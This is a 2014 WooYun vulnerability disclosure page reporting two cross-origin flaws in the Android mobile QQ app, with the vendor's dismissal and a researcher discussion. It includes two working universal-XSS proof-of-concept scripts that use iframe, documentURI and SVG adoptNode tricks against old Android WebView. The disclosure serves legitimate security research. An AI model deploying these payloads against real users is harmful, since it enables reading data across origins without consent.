当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068174

漏洞标题:手机QQ安卓版两处跨域问题

相关厂商:腾讯

漏洞作者: 瘦蛟舞

提交时间:2014-07-11 14:15

修复时间:2014-10-06 14:16

公开时间:2014-10-06 14:16

漏洞类型:用户敏感数据泄漏

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-11: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-06: 细节向公众公开

简要描述:

手机qq安卓版两处跨域问题

详细说明:

POC1

<body> 
<script> 
i = document.body.appendChild(document.createElement("iframe")); 
i.src = "http://m.baidu.com"; 
i.onload = function() 
{ 
document.documentURI = "javascript://hostname.com/%0D%0Aalert('OH HAI ' + location)"; 
i.contentWindow.location = ""; 
} 
</script> 
</body>


Screenshot_2014-07-08-11-58-30.png

漏洞证明:

POC2
test.html

<head>
<script>
main = function()
{
	specialFrame = document.body.appendChild(document.createElement("iframe"));
	document.adoptNode(specialFrame);
	document.implementation.createHTMLDocument().adoptNode(specialFrame);
	specialFrame.contentWindow.location = "http://www.baidu.com/";
	interval1 = setInterval(function() {
		if (specialFrame.contentDocument)
			return;
		clearInterval(interval1);
		specialFrame.src = "javascript:alert(document.body.innerHTML)";
		uxssFrame = document.body.appendChild(document.createElement("iframe"));
		uxssFrame.src = "test.svg";
	}, 100);
}
</script>
</head>
<body onload="main()"></body>


test.svg

<svg xmlns="http://www.w3.org/2000/svg">
<script>
svg = document.documentElement;
frame = svg.appendChild(document.createElementNS("http://www.w3.org/1999/xhtml", "iframe"));
frame.contentWindow.onunload = function() {
	svg.appendChild(top.specialFrame);
}
</script> 
<element param="1" param="2"/>
</svg>


Screenshot_2014-07-10-11-53-53.png

修复方案:

求解决方案

版权声明:转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-06 14:16

厂商回复:

非常感谢您的报告,此问题属于andriod webkit的漏洞,请尽量使用最新版的andriod系统。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-11 14:28 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    呵呵。。。。。 果断忽略,,

  2. 2014-07-11 14:30 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @mango 这个无所谓,希望他们能反馈下解决方案。

  3. 2014-07-11 14:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @瘦蛟舞 安卓的内核问题吧 升级?

  4. 2014-07-11 14:34 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @xsser android组件问题,主流手机浏览器都已经解决。感觉这种高安装量的客户端和浏览器类应用必须解决这个。

  5. 2014-07-11 14:37 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    前排出售瓜子

  6. 2014-07-11 14:49 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @瘦蛟舞 欢迎下次来众测

  7. 2014-07-11 14:50 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @xsser 已经和301混熟了。。。

  8. 2014-07-11 15:19 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @xsser @瘦蛟舞 放心绝对忽略。。。我提交过了。。。全部给我忽略了。。。连微信都忽略了。。。草!

  9. 2014-07-11 15:19 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @瘦蛟舞 解决方案我给过他们了

  10. 2014-07-11 15:20 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    洞主是个好人。

  11. 2014-07-11 15:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @mango 呵呵

  12. 2014-07-11 15:42 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    @mango 你跟他一样?

  13. 2014-07-11 15:44 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    mark 等更新,看厂商怎么回复

  14. 2014-07-11 15:50 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    洞主是个好人。

  15. 2014-07-11 16:07 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @xsser - - 你让我怎么理解这两个字!!!

  16. 2014-07-11 18:31 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @mango 呵呵

  17. 2014-07-11 19:40 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

    @mango 呵呵 不来我乌云提交的都是250

  18. 2014-07-11 20:59 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    又有人要喷"明明公开了我还看不到"  :)

  19. 2014-07-12 08:43 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    @超威蓝猫 新来的求为什么我看不见、、、

  20. 2014-07-12 08:50 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @Ev1l 是呀我也看不见 :)

  21. 2014-07-12 09:14 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    @超威蓝猫 ///大神你别笑话我了、为什么啊

  22. 2014-07-12 21:43 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    @瘦蛟舞 这种问题基本上除了那些自有内核的浏览器APP改了,因为是系统webkit的问题,其他大量用的webview的APP都会被影响,包括微信、来往、易信、微博等等,你也别用老版本的android了,你要是用2.3的android来测漏洞,什么疼的洞都有,app无辜躺枪。所以赶紧用4.4的来

  23. 2014-07-12 21:45 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @warning3 4.0 4.2 都有

  24. 2014-07-12 21:56 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    @mango 4.3也有啊,4.4就没了,你可以给google报,这是android的问题。就比如说你不能因为master key漏洞app能重打包绕过签名,就说是app的漏洞吧。APP能修复的系统问题自然去修复的好,但是这个问题要修复,至少得动很多,包括国外众多知名app都会被影响也没去修复,你也可以给facebook、给twitter报,只是人家忽略一下而已。

  25. 2014-07-12 22:09 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @warning3 android基本一个手机一个系统用到换手机。。kitkat以前都会受影响。。现在占有率最高的是jelly bean了。

  26. 2014-07-12 22:10 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    @瘦蛟舞 表示直接换苹果得了。。。不过今天也爆了苹果数据泄漏

  27. 2014-07-12 22:12 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @Ev1l 你和evil啥关系?

  28. 2014-07-12 22:12 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    @瘦蛟舞 额、、、你认为呢,基本没啥关系,我就是个小白。

  29. 2014-07-16 16:58 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

    @mango 乌云给忽略了怎么破?!!

  30. 2014-07-16 17:11 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @无花果 都忽略了

  31. 2014-07-20 10:44 | warning3 ( 实习白帽子 | Rank:40 漏洞数:6 | 巨人背后的安全专家,保障客户业务顺畅运行)

    @mango @瘦蛟舞 如果不忽略,那也可以报个手机qq master key漏洞伪造包的问题,哈哈

  32. 2014-07-20 15:12 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @warning3 哈哈~ 求案例~

  33. 2014-07-25 08:23 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

    @mango 塞班s60飘过无压力!!

  34. 2014-07-28 18:30 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    你这第一个是微信吧 - -

  35. 2014-07-28 18:39 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    @mango 少侠好眼力。。

  36. 2014-07-28 20:22 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @瘦蛟舞 = = 我就说么。。。QQ那早测试过了。。

  37. 2015-02-04 19:10 | 我是小号6 ( 实习白帽子 | Rank:37 漏洞数:25 | http://www.a666666.wang/)

    POC是怎么利用的呢?